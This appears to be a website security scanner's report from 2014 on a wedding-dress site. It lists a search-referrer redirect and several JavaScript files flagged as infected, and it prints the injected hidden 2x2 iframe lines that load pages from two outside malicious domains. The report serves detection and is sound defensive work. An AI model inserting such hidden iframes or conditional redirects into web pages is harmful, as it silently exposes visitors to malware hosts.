Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://withthewhitedress.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: withthewhitedress.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 25 Sep 2014 19:55:24 GMT Location: http://finquesonyar.net/fmcv.html?h=3131059 Server: Apache Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://withthewhitedress.com/ | 200 OK Content-Length: 10182 Content-Type: text/html | clean |
http://withthewhitedress.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://withthewhitedress.com/js/jquery.cycle.all.2.72.js | 200 OK Content-Length: 44173 Content-Type: text/javascript | clean |
http://withthewhitedress.com/js/jquery.galleriffic.js | 200 OK Content-Length: 33101 Content-Type: text/javascript | clean |
http://withthewhitedress.com/js/cufon-yui.js | 200 OK Content-Length: 18787 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059></iframe>');
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventLi Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://finquesonyar.net/fmcv.html?j=3131059 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059> | ||
http://withthewhitedress.com/js/titillium.font.js | 200 OK Content-Length: 13750 Content-Type: text/javascript | clean |
http://withthewhitedress.com/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 7175 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059></iframe>');
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://finquesonyar.net/fmcv.html?j=3131059 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059> | ||
http://withthewhitedress.com/js/boutique.js | 200 OK Content-Length: 2615 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/daml.html?j=3131059></iframe>'); $(document).ready(function() { $('#slider').nivoSlider({ effect:'sliceDownLeft', slices:8, animSpeed:1000, }); newsauthor.blur(function(){ if($(this).attr("value") == "") $(this).attr("value", newsauthorD); }); var newsemail = $("#newsemail"); var newsemailD = "Email"; newsemail.focus(function(){ if($(this).attr("value") == newsemailD) $(this).attr("value", ""); }); newsemail.blur(function(){ if($(this).attr("value") == "") $(this).attr("value", newsemailD); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://finquesonyar.net/fmcv.html?j=3131059 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://finquesonyar.net/fmcv.html?j=3131059> Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/daml.html?j=3131059 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/daml.html?j=3131059> | ||
http://withthewhitedress.com/photo/wedding-01.jpg | 200 OK Content-Length: 61079 Content-Type: image/jpeg | clean |
http://withthewhitedress.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
http://withthewhitedress.com/photo/wedding-02.jpg | 200 OK Content-Length: 55018 Content-Type: image/jpeg | clean |
http://withthewhitedress.com/photo/wedding-03.jpg | 200 OK Content-Length: 97477 Content-Type: image/jpeg | clean |
http://withthewhitedress.com/photo/wedding-04.jpg | 200 OK Content-Length: 77899 Content-Type: image/jpeg | clean |
http://withthewhitedress.com/photo/wedding-05.jpg | 200 OK Content-Length: 86646 Content-Type: image/jpeg | clean |
http://withthewhitedress.com/photo/wedding-06.jpg | 200 OK Content-Length: 69099 Content-Type: image/jpeg | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=withthewhitedress.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://withthewhitedress.com/
Result: withthewhitedress.com is not infected or malware details are not published yet.
Result: withthewhitedress.com is not infected or malware details are not published yet.